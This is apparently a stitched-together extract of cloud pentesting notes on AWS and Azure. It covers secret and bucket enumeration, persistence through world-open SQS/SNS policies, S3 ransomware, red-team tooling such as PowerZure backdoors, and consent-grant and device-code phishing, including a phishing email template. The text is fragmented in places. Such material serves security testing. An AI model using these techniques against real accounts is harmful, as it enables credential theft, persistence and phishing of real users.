aws-msk-privesc.md
Unauthenticated Access
aws-msk-unauthenticated-enum.md
Persistence
If you are going to have access to the VPC where a Provisioned Kafka is,
you could enable unauthorised access, if SASL/SCRAM authentication,
read the password from the secret, give some other controlled user IAM
permissions (if IAM or serverless used) or persist with certificates.
References
https://docs.aws.amazon.com/msk/latest/developerguide/what-is-
msk.html
IP-based routing
This is useful to tune your DNS routing to make the best DNS routing
decisions for your end users.\ IP-based routing offers you the additional
ability to optimize routing based on specific knowledge of your
customer base.
Enumeration
AWS Secrets Manager enables the ease of rotating secrets and therefore
enhancing the security of that secret. An example of this could be your
database credentials. Other secret types can also have automatic rotation
enabled through the use of lambda functions, for example, API keys.
To allow a user form a different account to access your secret you need to
authorize him to access the secret and also authorize him to decrypt the
secret in KMS. The Key policy also needs to allows the external user to use
it.
Enumeration
aws secretsmanager list-secrets #Get metadata of all secrets
aws secretsmanager list-secret-version-ids --secret-id
<secret_name> # Get versions
aws secretsmanager describe-secret --secret-id <secret_name> #
Get metadata
aws secretsmanager get-secret-value --secret-id <secret_name> #
Get value
aws secretsmanager get-resource-policy --secret-id --secret-id
<secret_name>
Persistence
It's possible to grant access to secrets to external accounts via KMS key
policies. Check the Secrets Manager Privesc page for more information.
Note that to access a secret, the external account will also need access to
the KMS key encrypting the secret.
Privesc
aws-secrets-manager-privesc.md
Enumeration
Persistence
In SQS you need to indicate with an IAM policy who has access to read
and write. It's possible to indicate external accounts, ARN of roles, or even
"*".\ The following policy gives everyone in AWS access to everything in
the queue called MyTestQueue:
{
"Version": "2008-10-17",
"Id": "__default_policy_ID",
"Statement": [
{
"Sid": "__owner_statement",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"SQS:*"
],
"Resource": "arn:aws:sqs:us-east-
1:123123123123:MyTestQueue"
}
]
}
Enumeration
aws sns list-topics
aws sns list-subscriptions
aws sns list-subscriptions-by-topic --topic-arn <arn>
Persistence
When creating a SNS topic you need to indicate with an IAM policy who
has access to read and write. It's possible to indicate external accounts,
ARN of roles, or even "*".\ The following policy gives everyone in AWS
access to read and write in the SNS topic called MySNS.fifo :
{
"Version": "2008-10-17",
"Id": "__default_policy_ID",
"Statement": [
{
"Sid": "__default_statement_ID",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"SNS:Publish",
"SNS:RemovePermission",
"SNS:SetTopicAttributes",
"SNS:DeleteTopic",
"SNS:ListSubscriptionsByTopic",
"SNS:GetTopicAttributes",
"SNS:AddPermission",
"SNS:Subscribe"
],
"Resource": "arn:aws:sns:us-east-
1:318142138553:MySNS.fifo",
"Condition": {
"StringEquals": {
"AWS:SourceOwner": "318142138553"
}
}
},
{
"Sid": "__console_pub_0",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "SNS:Publish",
"Resource": "arn:aws:sns:us-east-
1:318142138553:MySNS.fifo"
},
{
"Sid": "__console_sub_0",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "SNS:Subscribe",
"Resource": "arn:aws:sns:us-east-
1:318142138553:MySNS.fifo"
}
]
}
S3 Access logs
It's possible to enable S3 access login (which by default is disabled) to
some bucket and save the logs in a different bucket to know who is
accessing the bucket (both buckets must be in the same region).
S3 Encryption Mechanisms
DEK means Data Encryption Key and is the key that is always generated
and used to encrypt data.
Encryption:
Object Data + created plaintext DEK --> Encrypted data (stored
inside S3)
Created plaintext DEK + S3 Master Key --> Encrypted DEK
(stored inside S3) and plain text is deleted from memory
Decryption:
Encrypted DEK + S3 Master Key --> Plaintext DEK
Plaintext DEK + Encrypted data --> Object Data
Please, note that in this case the key is managed by AWS (rotation only
every 3 years). If you use your own key you willbe able to rotate, disable
and apply access control.
Encryption:
S3 request data keys from KMS CMK
KMS uses a CMK to generate the pair DEK plaintext and DEK
encrypted and send them to S£
S3 uses the paintext key to encrypt the data, store the encrypted
data and the encrypted key and deletes from memory the plain
text key
Decryption:
S3 ask to KMS to decrypt the encrypted data key of the object
KMS decrypt the data key with the CMK and send it back to S3
S3 decrypts the object data
Encryption:
The user sends the object data + Customer key to S3
The customer key is used to encrypt the data and the encrypted
data is stored
a salted HMAC value of the customer key is stored also for future
key validation
the customer key is deleted from memory
Decryption:
The user send the customer key
The key is validated against the HMAC value stored
The customer provided key is then used to decrypt the data
Encryption:
Client request for a data key to KMS
KMS returns the plaintext DEK and the encrypted DEK with the
CMK
Both keys are sent back
The client then encrypts the data with the plaintext DEK and send
to S3 the encrypted data + the encrypted DEK (which is saved as
metadata of the encrypted data inside S3)
Decryption:
The encrypted data with the encrypted DEK is sent to the client
The client asks KMS to decrypt the encrypted key using the CMK
and KMS sends back the plaintext DEK
The client can now decrypt the encrypted data
Encryption:
The client generates a DEK and encrypts the plaintext data
Then, using it's own custom CMK it encrypts the DEK
submit the encrypted data + encrypted DEK to S3 where it's
stored
Decryption:
S3 sends the encrypted data and DEK
As the client already has the CMK used to encrypt the DEK, it
decrypts the DEK and then uses the plaintext DEK to decrypt the
data
Enumeration
One of the traditional main ways of compromising AWS orgs start by
compromising buckets publicly accesible. You can find public buckets
enumerators in this page.
# Get buckets ACLs
aws s3api get-bucket-acl --bucket <bucket-name>
aws s3api get-object-acl --bucket <bucket-name> --key flag
# Get policy
aws s3api get-bucket-policy --bucket <bucket-name>
aws s3api get-bucket-policy-status --bucket <bucket-name> #if
it's public
# delete
aws s3 rb s3://bucket-name –-force
dual-stack
You can access an S3 bucket through a dual-stack endpoint by using a
virtual hosted-style or a path-style endpoint name. These are useful to
access S3 through IPv6.
bucketname.s3.dualstack.aws-region.amazonaws.com
s3.dualstack.aws-region.amazonaws.com/bucketname
Privesc
In the following page you can check how to abuse S3 permissions to
escalate privileges:
aws-s3-privesc.md
Unauthenticated Access
aws-s3-unauthenticated-enum.md
Persistence
S3 Ransomware
s3-ransomware.md
Amazon Athena
Amazon Athena is an interactive query service that makes it easy to
analyze data directly in Amazon Simple Storage Service (Amazon S3)
using standard SQL.
You need to prepare a relational DB table with the format of the content
that is going to appear in the monitored S3 buckets. And then, Amazon
Athena will be able to populate the DB from the logs, so you can query it.
SSE-C and CSE-E are not supported. In addition to this, it's important to
understand that Amazon Athena will only run queries against encrypted
objects that are in the same region as the query itself. If you need to
query S3 data that's been encrypted using KMS, then specific permissions
are required by the Athena user to enable them to perform the query.
Enumeration
# Get catalogs
aws athena list-data-catalogs
# Run query
aws athena start-query-execution --query-string <query>
References
https://cloudsecdocs.com/aws/defensive/tooling/cli/#s3
https://hackingthe.cloud/aws/post_exploitation/s3_acl_persistence/
https://docs.aws.amazon.com/AmazonS3/latest/userguide/dual-stack-
endpoints.html
The following screenshot shows an example of a file that was targeted for a
ransomware attack. As you can see, the account ID that owns the KMS key
that was used to encrypt the object (7**********2) is different than the
account ID of the account that owns the object (2**********1).
Here you can find a ransomware example that does the following:
1. Gathers the first 100 objects in the bucket (or all, if fewer than 100
objects in the bucket)
2. One by one, overwrites each object with itself using the new KMS
encryption key
For more info check the original research.
https://github.com/carlospolop/leakos
https://github.com/carlospolop/pastos
https://github.com/carlospolop/gorks
AWS Unauthenticated Enum & Access
There are several services in AWS that could be configured giving some
kind of access to all Internet or to more people than expected. Check here
how:
During the talk they specify several examples, such as S3 buckets allowing
cloudtrail (of any AWS account) yo write to them:
AWS Config
Serverless repository
Tools
cloud_enum: Multi-cloud OSINT tool. Find public resources in
AWS, Azure, and Google Cloud. Supported AWS services: Open /
Protected S3 Buckets, awsapps (WorkMail, WorkDocs, Connect, etc.)
Brute-Force
You create a lest of potential account IDs and aliases and check them
OSINT
Look for urls that contains <alias>.signin.aws.amazon.com with an alias
related to the organization.
Marketplace
If a vendor has instances in the marketplace, you can get the owner id
(account id) of the AWS account he used.
Snapshots
Public EBS snapshots (EC2 -> Snapshots -> Public Snapshots)
RDS public snapshots (RDS -> Snapshots -> All Public Snapshots)
Public AMIs (EC2 -> AMIs -> Public images)
Errors
Many AWS error messages (even access denied) will give that information.
References
https://www.youtube.com/watch?v=8ZXRw4Ry3mQ
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Permission",
"Action": [
"execute-api:Execution-operation"
],
"Resource": [
"arn:aws:execute-api:region:account-id:api-
id/stage/METHOD_HTTP_VERB/Resource-path"
]
}
]
}
The problem with this way to give permissions to invoke endpoints is that
the "*" implies "anything" and there is no more regex syntax
supported.
Some examples:
Note that "*" doesn't stop expanding with slashes, therefore, if you use
"*" in api-id for example, it could also indicate "any stage" or "any method"
as long as the final regex is still valid.\ So arn:aws:execute-apis:sa-east-
You should always have clear what you want to allow to access and then
check if other scenarios are possible with the permissions granted.
For more info, apart of the docs, you can find code to implement
authorizers in this official aws github.
https://{random_id}.execute-api.
{region}.amazonaws.com/{user_provided}
https://{random_id}.cloudfront.net
aws-cognito-enum
Identity Pool ID
Identity Pools can grant IAM roles to unauthenticated users that just
know the Identity Pool ID (which is fairly common to find), and attacker
with this info could try to access that IAM role and exploit it.\ Moreoever,
IAM roles could also be assigned to authenticated users that access the
Identity Pool. If an attacker can register a user or already has access to the
identity provider used in the identity pool you could access to the IAM
role being given to authenticated users and abuse its privileges.
User Pool ID
By default Cognito allows to register new user. Being able to register a
user might give you access to the underlaying application or to the
authenticated IAM access role of an Identity Pool that is accepting as
identity provider the Cognito User Pool. Check how to do that here.
<name>.cluster-<random>.<region>.docdb.amazonaws.com
# Public AMIs
aws ec2 describe-images --executable-users all
## Search AMI by ownerID
aws ec2 describe-images --executable-users all --query
'Images[?contains(ImageLocation, `967541184254/`) == `true`]'
## Search AMI by substr ("shared" in the example)
aws ec2 describe-images --executable-users all --query
'Images[?contains(ImageLocation, `shared`) == `true`]'
# EC2
ec2-{ip-seperated}.compute-1.amazonaws.com
# ELB
http://{user_provided}-{random_id}.
{region}.elb.amazonaws.com:80/443
https://{user_provided}-{random_id}.{region}.elb.amazonaws.com
Support HackTricks and get benefits!
AWS - Elasticsearch
Unauthenticated Enum
Support HackTricks and get benefits!
https://vpc-{user_provided}-[random].[region].es.amazonaws.com
https://search-{user_provided}-[random].
[region].es.amazonaws.com
If you try to assume a role that you don’t have permissions to, AWS will
output an error similar to:
You can use this script to enumerate potential principals abusing this issue.
When you save the policy, if the resource is found, the trust policy will
save successfully, but if it is not found, then an error will be thrown,
indicating an invalid principal was supplied.
Note that in that resource you could specify a cross account role or user:
arn:aws:iam::acc_id:role/role_name
arn:aws:iam::acc_id:user/user_name
This is a policy example:
{
"Version":"2012-10-17",
"Statement":[
{
"Effect":"Allow",
"Principal":
{
"AWS":"arn:aws:iam::216825089941:role\/Test"
},
"Action":"sts:AssumeRole"
}
]
}
GUI
That is the error you will find if you uses a role that doesn't exist. If the
role exist, the policy will be saved without any errors. (The error is for
update, but it also works when creating)
CLI
### You could also use: aws iam update-assume-role-policy
# When it works
aws iam create-role --role-name Test-Role --assume-role-policy-
document file://a.json
{
"Role": {
"Path": "/",
"RoleName": "Test-Role",
"RoleId": "AROA5ZDCUJS3DVEIYOB73",
"Arn": "arn:aws:iam::947247140022:role/Test-Role",
"CreateDate": "2022-05-03T20:50:04Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS":
"arn:aws:iam::316584767888:role/account-balance"
},
"Action": [
"sts:AssumeRole"
]
}
]
}
}
}
./unauth_wordlist.txt
Privesc
In the case the role was bad configured an allows anyone to assume it:
The attacker could just assume it.
Third Party OIDC Federation
Imagine that you manage to read a Github Actions workflow that is
accessing a role inside AWS.\ This trust might give access to a role with the
following trust policy:
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Federated": "arn:aws:iam::<acc_id>:oidc-
provider/token.actions.githubusercontent.com"
},
"Action": "sts:AssumeRoleWithWebIdentity",
"Condition": {
"StringEquals": {
"token.actions.githubusercontent.com:aud":
"sts.amazonaws.com"
}
}
}
]
}
This trust policy might be correct, but the lack of more conditions should
make you distrust it.\ This is because the previous role can be assumed by
ANYONE from Github Actions! You should specify in the conditions also
other things such as org name, repo name, env, brach...
"StringLike": {
"token.actions.githubusercontent.com:sub":
"repo:org_name*:*"
}
Note that wildcard (*) before the colon (:). You can create an org such as
org_name1 and assume the role from a Github Action.
References
https://www.youtube.com/watch?v=8ZXRw4Ry3mQ
https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-
enumeration/
https://hackingthe.cloud/aws/enumeration/enum_iam_user_role/
mqtt://{random_id}.iot.{region}.amazonaws.com:8883
https://{random_id}.iot.{region}.amazonaws.com:8443
https://{random_id}.iot.{region}.amazonaws.com:443
https://{random_id}.kinesisvideo.{region}.amazonaws.com
https://{random_id}.lambda-url.{region}.on.aws/
https://{random_id}.mediaconvert.{region}.amazonaws.com
https://{random_id}.mediapackage.
{region}.amazonaws.com/in/v1/{random_id}/channel
https://{random_id}.data.mediastore.{region}.amazonaws.com
ActiveMQ
In case of ActiveMQ, by default public access and ssl are enabled, but you
need credentials to access.
https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162/
ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617
Public Port
It's possible to expose the Kafka broker to the public, but you will need
credentials, IAM permissions or a valid certificate (depending on the auth
method configured).
It's also possible to disabled authentication, but in that case it's not
possible to directly expose the port to the Internet.
b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.
{region}.amazonaws.com
{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com
mysql://{user_provided}.{random_id}.
{region}.rds.amazonaws.com:3306
postgres://{user_provided}.{random_id}.
{region}.rds.amazonaws.com:5432
{user_provided}.<random>.<region>.redshift.amazonaws.com
https://sqs.[region].amazonaws.com/[account-id]/{user_provided}
Brute-Force
You can find buckets by brute-forcing names related to the company you
are pentesting:
https://github.com/sa7mon/S3Scanner
https://github.com/clario-tech/s3-inspector
https://github.com/jordanpotti/AWSBucketDump (Contains a list with
potential bucket names)
https://github.com/fellchase/flumberboozle/tree/master/flumberbuckets
https://github.com/smaranchand/bucky
https://github.com/tomdev/teh_s3_bucketeers
https://github.com/RhinoSecurityLabs/Security-
Research/tree/master/tools/aws-pentest-tools/s3
https://github.com/Eilonh/s3crets_scanner
# Generate a wordlist to create permutations
curl -s
https://raw.githubusercontent.com/cujanovic/goaltdns/master/wor
ds.txt > /tmp/words-s3.txt.temp
curl -s
https://raw.githubusercontent.com/jordanpotti/AWSBucketDump/mas
ter/BucketNames.txt >>/tmp/words-s3.txt.temp
cat /tmp/words-s3.txt.temp | sort -u > /tmp/words-s3.txt
## Call s3scanner
s3scanner --threads 100 scan --buckets-file /tmp/final-words-
s3.txt | grep bucket_exists
By DNS
You can get the region of a bucket with a dig and nslookup by doing a
DNS request of the discovered IP:
dig flaws.cloud
;; ANSWER SECTION:
flaws.cloud. 5 IN A 52.218.192.11
nslookup 52.218.192.11
Non-authoritative answer:
11.192.218.52.in-addr.arpa name = s3-website-us-west-
2.amazonaws.com.
Check that the resolved domain have the word "website".\ You can access
the static website going to: flaws.cloud.s3-website-us-west-
By Trying
If you try to access a bucket, but in the domain name you specify another
region (for example the bucket is in bucket.s3.amazonaws.com but you
try to access bucket.s3-website-us-west-2.amazonaws.com , then you will
be indicated to the correct location:
Open to everyone:
Private:
If the bucket doesn't have a domain name, when trying to enumerate it, only
put the bucket name and not the whole AWSs3 domain. Example:
s3://<BUCKETNAME>
https://{user_provided}.s3.amazonaws.com
References
https://www.youtube.com/watch?v=8ZXRw4Ry3mQ
Basic Information
az-basic-information.md
Azure Pentester/Red Team
Methodology
In order to audit an AZURE environment it's very important to know:
which services are being used, what is being exposed, who has access to
what, and how are internal Azure services and external services connected.
From a Red Team point of view, the first step to compromise an Azure
environment is to manage to obtain some credentials for Azure AD. Here
you have some ideas on how to do that:
C:\Users\USERNAME\.azure
Even if you haven't compromised any user inside the Azure tenant you
are attacking, you can gather some information from it:
az-unauthenticated-enum-and-initial-entry
After you have managed to obtain credentials, you need to know to who do
those creds belong, and what they have access to, so you need to perform
some basic enumeration:
Basic Enumeration
Remember that the noisiest part of the enumeration is the login, not the
enumeration itself.
SSRF
If you found a SSRF in a machine inside Azure check this page for tricks:
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-
forgery/cloud-ssrf
In cases where you have some valid credentials but you cannot login, these
are some common protections that could be in place:
After bypassing it, you might be able to get back to your initial setup and
you will still have access.
Whoami
Learn how to install az cli, AzureAD and Az PowerShell in the Az -
AzureAD section.
One of the first things you need to know is who you are (in which
environment you are):
az cli
az account list
az account tenant list # Current tenant info
az account subscription list # Current subscription info
az ad signed-in-user show # Current signed-in user
az ad signed-in-user list-owned-objects # Get owned objects by
current user
az account management-group list #Not allowed by default
AzureAD
#Get the current session state
Get-AzureADCurrentSessionInfo
#Get details of the current tenant
Get-AzureADTenantDetail
Az PowerShell
AzureAD Enumeration
By default, any user should have enough permissions to enumerate things
such us, users, groups, roles, service principals... (check default AzureAD
permissions).\ You can find here a guide:
az-azuread.md
Now that you have some information about your credentials (and if you
are a red team hopefully you haven't been detected). It's time to figure out
which services are being used in the environment.\ In the following section
you can check some ways to enumerate some common services.
Service Principal and Access Policy
An Azure service can have a System Identity (of the service itself) or use a
User Assigned Managed Identity. This Identity can have Access Policy to,
for example, a KeyVault to read secrets. These Access Policies should be
restricted (least privilege principle), but might have more permissions than
required. Typically an App Service would use KeyVault to retrieve secrets
and certificates.
cd ROADTools
pipenv shell
roadrecon auth -u [email protected] -p "Welcome2022!"
roadrecon gather
roadrecon gui
Stormspotter
# Start Backend
cd stormspotter\backend\
pipenv shell
python ssbackend.pyz
# Start Front-end
cd stormspotter\frontend\dist\spa\
quasar.cmd serve -p 9091 --history
# Run Stormcollector
cd stormspotter\stormcollector\
pipenv shell
az login -u [email protected] -p Welcome2022!
python stormspotter\stormcollector\sscollector.pyz cli
# This will generate a .zip file to upload in the frontend
(127.0.0.1:9091)
AzureHound
# You need to use the Az PowerShell and Azure AD modules:
$passwd = ConvertTo-SecureString "Welcome2022!" -AsPlainText -
Force
$creds = New-Object System.Management.Automation.PSCredential
("[email protected]", $passwd)
Connect-AzAccount -Credential $creds
Import-Module AzureAD\AzureAD.psd1
Connect-AzureAD -Credential $creds
# Launch AzureHound
. AzureHound\AzureHound.ps1
Invoke-AzureHound -Verbose
# Simple queries
## All Azure Users
MATCH (n:AZUser) return n.name
## All Azure Applications
MATCH (n:AZApp) return n.objectid
## All Azure Devices
MATCH (n:AZDevice) return n.name
## All Azure Groups
MATCH (n:AZGroup) return n.name
## All Azure Key Vaults
MATCH (n:AZKeyVault) return n.name
## All Azure Resource Groups
MATCH (n:AZResourceGroup) return n.name
## All Azure Service Principals
MATCH (n:AZServicePrincipal) return n.objectid
## All Azure Virtual Machines
MATCH (n:AZVM) return n.name
## All Principals with the ‘Contributor’ role
MATCH p = (n)-[r:AZContributor]->(g) RETURN p
# Advanced queries
## Get Global Admins
MATCH p =(n)-[r:AZGlobalAdmin*1..]->(m) RETURN p
## Owners of Azure Groups
MATCH p = (n)-[r:AZOwns]->(g:AZGroup) RETURN p
## All Azure Users and their Groups
MATCH p=(m:AZUser)-[r:MemberOf]->(n) WHERE NOT m.objectid
CONTAINS 'S-1-5' RETURN p
## Privileged Service Principals
MATCH p = (g:AZServicePrincipal)-[r]->(n) RETURN p
## Owners of Azure Applications
MATCH p = (n)-[r:AZOwns]->(g:AZApp) RETURN p
## Paths to VMs
MATCH p = (n)-[r]->(g: AZVM) RETURN p
## Paths to KeyVault
MATCH p = (n)-[r]->(g:AZKeyVault) RETURN p
## Paths to Azure Resource Group
MATCH p = (n)-[r]->(g:AZResourceGroup) RETURN p
## On-Prem users with edges to Azure
MATCH p=(m:User)-
[r:AZResetPassword|AZOwns|AZUserAccessAdministrator|AZContribut
or|AZAddMembers|AZGlobalAdmin|AZVMContributor|AZOwnsAZAvereCont
ributor]->(n) WHERE m.objectid CONTAINS 'S-1-5-21' RETURN p
## All Azure AD Groups that are synchronized with On-Premise AD
MATCH (n:Group) WHERE n.objectid CONTAINS 'S-1-5' AND
n.azsyncid IS NOT NULL RETURN n
Azucar
# You should use an account with at least read-permission on
the assets you want to access
git clone https://github.com/nccgroup/azucar.git
PS> Get-ChildItem -Recurse c:\Azucar_V10 | Unblock-File
MicroBurst
Import-Module .\MicroBurst.psm1
Import-Module .\Get-AzureDomainInfo.ps1
Get-AzureDomainInfo -folder MicroBurst -Verbose
PowerZure
Connect-AzAccount
ipmo C:\Path\To\Powerzure.psd1
Get-AzureTarget
# Reader
$ Get-Runbook, Get-AllUsers, Get-Apps, Get-Resources, Get-
WebApps, Get-WebAppDetails
# Contributor
$ Execute-Command -OS Windows -VM Win10Test -ResourceGroup
Test-RG -Command "whoami"
$ Execute-MSBuild -VM Win10Test -ResourceGroup Test-RG -File
"build.xml"
$ Get-AllSecrets # AllAppSecrets, AllKeyVaultContents
$ Get-AvailableVMDisks, Get-VMDisk # Download a virtual
machine's disk
# Owner
$ Set-Role -Role Contributor -User [email protected] -Resource
Win10VMTest
# Administrator
$ Create-Backdoor, Execute-Backdoor
Management Groups
If your organization has many Azure subscriptions, you may need a way
to efficiently manage access, policies, and compliance for those
subscriptions. Management groups __ provide a governance scope
above subscriptions.
Azure Subscriptions
An Azure subscription is a logical container used to provision related
business or technical resources in Azure. It holds the details of all your
resources like virtual machines (VMs), databases, and more. When you
create an Azure resource like a VM, you identify the subscription it
belongs to. It allows you to delegate access through role-based access-
control mechanisms.
Resource Groups
A resource group is a container that holds related resources for an Azure
solution. The resource group can include all the resources for the solution,
or only those resources that you want to manage as a group. Generally,
add resources that share the same lifecycle to the same resource group so
you can easily deploy, update, and delete them as a group.
All the resources must be inside a resource group and can belong only to
a group and if a resource group is deleted, all the resources inside it are also
deleted.
Administrative Units
Administrative units let you subdivide your organization into any unit that
you want, and then assign specific administrators that can manage only
the members of that unit. For example, you could use administrative units
to delegate permissions to administrators of each school at a large
university, so they could control access, manage users, and set policies only
in the School of Engineering.
Roles assigned to groups are inherited by all the members of the group.
Depending on the scope the role was assigned to, the role cold be inherited
to other resources inside the scope container. For example, if a user A has
a role on the subscription, he will have that role on all the resource
groups inside the subscription and on all the resources inside the resource
group.
Classic Roles
Full access to all
resources All resource
Owner Can manage access for types
other users
All resource
Reader • View all resources
types
View all resources
User Access Can manage access for All resource
Administrator other users types
Built-In roles
Azure role-based access control (Azure RBAC) has several Azure built-in
roles that you can assign to users, groups, service principals, and
managed identities. Role assignments are the way you control access to
Azure resources. If the built-in roles don't meet the specific needs of your
organization, you can create your own Azure custom roles.
Built-In roles apply only to the resources they are meant to, for example
check this 2 examples of Built-In roles over Compute resources:
Custom Roles
Azure also allow to create custom roles with the permissions the user
needs.
Permission Denied
In order for a principal to have some access over a resource he
needs an explicit role being granted to him (anyhow) granting him
that permission.
An explicit deny role assignment takes precedence over the role
granting the permission.
Global Administrator
Users with the Global Administrator role has the ability to 'elevate' to User
Access Administrator Azure role to the root management group. This
means that a Global Administrator will be able to manage access all Azure
subscriptions and management groups.\ **This elevation can be done at
the end of the page:
https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMen
uBlade/~/Properties
You can see the full list of default permissions of users in the docs.
Moreover, note that in that list you can also see the guests default
permissions list.
**[Access Tokens](https://learn.microsoft.com/en-us/azure/active-
directory/develop/access-tokens): The client presents this token to
the resource server to access resources. It can be used only for a
specific combination of user, client, and resource and cannot be
revoked** until expiry - that is 1 hour by default. Detection is low
using this.
ID Tokens: The client receives this token from the authorization
server. It contains basic information about the user. It is bound to a
specific combination of user and client.
Refresh Tokens: Provided to the client with access token. Used to get
new access and ID tokens. It is bound to a specific combination of
user and client and can be revoked. Default expiry is 90 days for
inactive refresh tokens and no expiry for active tokens.
Information for conditional access is stored inside the JWT. So, if you
request the token from an allowed IP address, that IP will be stored in
the token and then you can use that token from a non-allowed IP to access
the resources.
Check the following page to learn different ways to request access tokens
and login with them:
az-azuread.md
The most common API endpoints are:
API Information
Login
login.microsoftonline.com/\/.well-known/openid- information,
configuration including
tenant ID
autodiscover- All domains
s.outlook.com/autodiscover/autodiscover.svc of the tenant
Login
information of
the tenant,
including
login.microsoftonline.com/GetUserRealm.srf?login=\
tenant Name
and domain
authentication
type
Login
information,
login.microsoftonline.com/common/GetCredentialType including
Desktop SSO
information
You can query all the information of an Azure tenant with just one
command of the AADInternals library:
From the output we can see the tenant information of the target
organisation, including the tenant name, id and the “brand�? name. We can
also see whether the Desktop SSO (aka Seamless SSO) is enabled. If
enabled, we can find out whether a given user exists in the target
organisation or not (user enumeration).
We can also see the names of all (verified) domains and their identity types
of the target tenant. For federated domains, the FQDN of the used identity
provider (usually ADFS server) is also shown. The MX column indicates
whether the email is send to Exchange online or not. The SPF column
indicates whether Exchange online is listed as an email sender. Note!
Currently the recon function does not follow the include statements of SPF
records, so there can be false-negatives.
User Enumeration
It's possible to check if a username exists inside a tenant. This includes
also guest users, whose username is in the format:
<email>#EXT#@<tenant name>.onmicrosoft.com
With AADInternals, you can easily check if the user exists or not:
Output:
UserName Exists
-------- ------
[email protected] True
You can also use a text file containing one email address per row:
[email protected]
[email protected]
[email protected]
[email protected]
external.user_gmail.com#EXT#@company.onmicrosoft.com
external.user_outlook.com#EXT#@company.onmicrosoft.com
Method Description
This refers to the GetCredentialType API mentioned
Normal
above. The default method.
This method tries to log in as the user.
Login Note: queries will be logged to sign-ins log.
After discovering the valid usernames you can get info about a user with:
You can use a method from MicroBust for such goal. This function will
search the base domain name (and a few permutations) in several azure
service domains:
Import-Module .\MicroBurst\MicroBurst.psm1
Invoke-EnumerateAzureBlobs -Base corp
[...]
https://corpcommon.blob.core.windows.net/secrets?
restype=container&comp=list
[...]
# Access https://corpcommon.blob.core.windows.net/secrets?
restype=container&comp=list
# Check: <Name>ssh_info.json</Name>
# Access then
https://corpcommon.blob.core.windows.net/secrets/ssh_info.json
SAS URLs
A shared access signature (SAS) URL is an URL that provides access to
certain part of a Storage account (could be a full container, a file...) with
some specific permissions (read, write...) over the resources. If you find one
leaked you could be able to access sensitive information, they look like this
(this is to access a container, if it was just granting access to a file the path
of the URL will also contain that file):
https://<storage_account_name>.blob.core.windows.net/newcontainer?
sp=r&st=2021-09-26T18:15:21Z&se=2021-10-
27T02:14:21Z&spr=https&sv=2021-07-
08&sr=c&sig=7S%2BZySOgy4aA3Dk0V1cJyTSIf1cW%2Fu3WFkhHV32%2B4PE%3D
Only permissions that doesn't require admin consent are classified as low
impact. These are permissions required for basic sign-in are openid,
profile, email, User.Read and offline_access. If an organization allows
user consent for all apps, an employee can grant consent to an app to read
the above from their profile.
{ % code overflow="wrap" %}
PS AzureADPreview>
(GetAzureADMSAuthorizationPolicy).PermissionGrantPolicyIdsAssig
nedToDefaultUserRole
In simple words when the victim clicks on that beautiful blue button of
"Accept", Azure AD sends a token to the third party site which belongs to
an attacker where attacker will use the token to perform actions on behalf
the victims like accessing all the Files, Read Mails, Send Mails etc.
Attack Flow
To perform this attack against the company "ecorp" the attacker could
registered a domain with name "safedomainlogin.com" and created a
subdomain "ecorp.safedomainlogin.com" where they hosted the
application to capture the authorization code and then request for the
access tokens.
The attacker finally creates the link that contained the client id of the
malicious application and shared the link with the targeted users to gain
their consent.
365-Stealer
You can perform this attack with 365-Stealer.
As extra step, if you have some access over a user in the victim
organisation, you can check if the policy will allow him to accept to apps:
Import-Module .\AzureADPreview\AzureADPreview.psd1
$passwd = ConvertTo-SecureString "Welcome2022!" -AsPlainText -
Force
$creds = New-Object System.Management.Automation.PSCredential
("[email protected]", $passwd)
Connect-AzureAD -Credential $creds
(Get-
AzureADMSAuthorizationPolicy).PermissionGrantPolicyIdsAssignedT
oDefaultUserRole
# If "ManagePermissionGrantsForSelf.microsoft-user-default-
legacy", he can
For this attack you will need to create a new App in your Azure Tenant
with, for example, the following permissions:
Check https://www.alteredsecurity.com/post/introduction-to-365-stealer to
learn how to configure it.
Note that the obtained access token will be for the graph endpoint with
the scopes: User.Read and User.ReadBasic.All (the requested
permissions). You won't be able to performs other actions (but those are
enough to download info about all the users in the org).
Post-Exploitation
Once you got access to the user you can do things such as stealing sensitive
documents and even uploading backdoored document files.
References
This post was copied from
https://www.alteredsecurity.com/post/introduction-to-365-stealer
https://login.microsoftonline.com/common/oauth2/devicecode?
api-version=1.0
Parameter Value
client_id d3590ed6-52b3-4102-aeff-aad2292ab01c
resource https://graph.windows.net
{
"user_code": "CLZ8HAV2L",
"device_code": "CAQABAAEAAAB2UyzwtQEKR7-
rWbgdcBZIGm0IlLxBn23EWIrgw7fkNIKyMdS2xoEg9QAntABbI5ILrinFM2ze8d
VKdixlThVWfM8ZPhq9p7uN8tYIuMkfVJ29aUnUBTFsYCmJCsZHkIxtmwdCsIlKp
OQij2lJZzphfZX8j0nktDpaHVB0zm-vqATogllBjA-t_ZM2B0cgcjQgAA",
"verification_url": "https://microsoft.com/devicelogin",
"expires_in": "900",
"interval": "5",
"message": "To sign in, use a web browser to open the page
https://microsoft.com/devicelogin and enter the code CLZ8HAV2L
to authenticate."
}
Parameter Description
user_code The code a user will enter when requested
The device code used to “poll�? for authentication
device_code
result
verification_url The url the user needs to browse for authentication
expires_in The expiration time in seconds (15 minutes)
The interval in seconds how often the client should
interval
poll for authentication
message The pre-formatted message to be show to the user
$body=@{
"client_id" = "d3590ed6-52b3-4102-aeff-aad2292ab01c"
"resource" = "https://graph.windows.net"
}
Note! I’m using a version 1.0 which is a little bit different than v2.0 flow
used in the documentation.
2. Creating a phishing email
Now that we have the verification_url (always the same) and user_code
we can create and send a phishing email.
# Create a message
$message = @"
<html>
Hi!<br>
Here is the link to the <a
href="https://microsoft.com/devicelogin">document</a>. Use the
following code to access: <b>$user_code</b>. <br><br>
</html>
"@
